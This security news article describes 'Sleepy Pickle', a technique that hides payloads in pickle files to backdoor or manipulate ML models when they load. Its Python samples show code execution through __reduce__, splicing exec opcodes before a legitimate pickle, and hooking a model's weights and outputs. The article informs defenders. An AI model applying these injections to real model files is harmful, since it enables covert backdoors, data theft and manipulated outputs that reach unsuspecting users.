New Attack Technique 'Sleepy Pickle' Targets Machine Learning Models

Jun 13, 2024 | Newsroom | Vulnerability / Software Security

The security risks posed by the Pickle format have once again come to the fore with the discovery of a new “hybrid machine learning (ML) model exploitation technique” dubbed Sleepy Pickle.

The attack method, per Trail of Bits, weaponizes the ubiquitous format used to package and distribute machine learning (ML) models to corrupt the model itself, posing a severe supply chain risk to an organization's downstream customers.

“Sleepy Pickle is a stealthy and novel attack technique that targets the ML model itself rather than the underlying system,” security researcher Boyan Milanov said.


While pickle is a serialization format widely used by ML libraries like PyTorch, it can be abused to carry out arbitrary code execution attacks simply by loading a pickle file (i.e., during deserialization).
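This is by design: a pickle stream can reference any importable callable and invoke it with attacker-chosen arguments during deserialization. A minimal sketch, using a harmless `eval` call where a real attacker would typically use something like `os.system`:

```python
import pickle

class Payload:
    def __reduce__(self):
        # __reduce__ tells pickle how to reconstruct this object:
        # "call this callable with these arguments". An attacker can
        # return any importable callable here.
        return (eval, ("1 + 1",))

malicious = pickle.dumps(Payload())

# Merely deserializing the bytes runs the embedded call.
result = pickle.loads(malicious)
print(result)  # 2 -- the return value of the injected eval
```

The victim never has to call anything on the object; `pickle.loads` alone triggers the execution.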

“We suggest loading models from users and organizations you trust, relying on signed commits, and/or loading models from [TensorFlow] or Jax formats with the from_tf=True auto-conversion mechanism,” Hugging Face points out in its documentation.

Sleepy Pickle works by inserting a payload into a pickle file using open-source tools like Fickling, and then delivering it to a target host by means of one of four techniques: an adversary-in-the-middle (AitM) attack, phishing, supply chain compromise, or the exploitation of a system weakness.
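Fickling automates this kind of injection; the hand-rolled sketch below illustrates the underlying idea by splicing extra opcodes in front of a legitimate protocol-0 pickle, so the payload runs first and the victim still receives the object they expected. (The environment variable stands in for real attacker code.)

```python
import os
import pickle

# A legitimate pickle (protocol 0 keeps the byte stream easy to splice).
legit = pickle.dumps({"weights": [0.1, 0.2, 0.3]}, protocol=0)

# Prepend opcodes that call exec(...) and discard its result, so the
# stream still deserializes to the original object afterwards.
payload = (
    b"cbuiltins\nexec\n"                               # push builtins.exec
    b"(S'import os; os.environ[\"PWNED\"] = \"1\"'\n"  # push code string
    b"tR0"                                             # call exec, pop result
    + legit                                            # original pickle, ends with STOP
)

obj = pickle.loads(payload)   # looks like a perfectly normal load...
print(obj)                    # {'weights': [0.1, 0.2, 0.3]}
print(os.environ["PWNED"])    # ...but the side effect already happened
```

Because the deserialized object is intact, nothing looks wrong to the victim application.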


“When the file is deserialized on the victim's system, the payload is executed and modifies the contained model in-place to insert backdoors, control outputs, or tamper with processed data before returning it to the user,” Milanov said.

Put differently, the payload injected into the pickle file containing the serialized ML model can be abused to alter model behavior by tampering with the model weights, or by tampering with the input and output data processed by the model.
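A toy illustration of what such a payload could do once it is executing inside the victim's process (the model class, its weights, and the `generate` hook are hypothetical stand-ins for, say, a real PyTorch model):

```python
# Toy stand-in for a model already loaded in the victim's process.
class TinyModel:
    def __init__(self):
        self.weights = [0.8, -0.3, 1.2]
        self.generate = lambda prompt: f"answer for {prompt!r}"

model = TinyModel()

# --- What a Sleepy Pickle payload could do in-process ---

# 1. Tamper with the weights in place (e.g. to plant a backdoor).
model.weights = [0.0 for _ in model.weights]

# 2. Wrap output processing to rewrite what users see; an attacker
#    could swap legitimate links for phishing URLs here.
original_generate = model.generate
def hooked_generate(prompt):
    out = original_generate(prompt)
    return out.replace("answer", "manipulated answer")
model.generate = hooked_generate

print(model.weights)                   # [0.0, 0.0, 0.0]
print(model.generate("flu remedies"))  # manipulated answer for 'flu remedies'
```

Either lever (weights or I/O hooks) lets the attacker change what the model produces without leaving a separate malicious process behind.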

In a hypothetical attack scenario, the approach could be used to generate harmful outputs or misinformation that can have disastrous consequences for user safety (e.g., drink bleach to cure flu), steal user data when certain conditions are met, and attack users indirectly by generating manipulated summaries of news articles with links pointing to a phishing page.


Trail of Bits said that Sleepy Pickle can be weaponized by threat actors to maintain surreptitious access to ML systems in a manner that evades detection, given that the model is compromised when the pickle file is loaded in the Python process.

This is also more effective than directly uploading a malicious model to Hugging Face, as it can modify model behavior or output dynamically without having to entice targets into downloading and running the model themselves.

“With Sleepy Pickle attackers can create pickle files that aren't ML models but can still corrupt local models if loaded together,” Milanov said. “The attack surface is thus much broader, because control over any pickle file in the supply chain of the target organization is enough to attack their models.”

“Sleepy Pickle demonstrates that advanced model-level attacks can exploit lower-level supply chain weaknesses via the connections between underlying software components and the final application.”
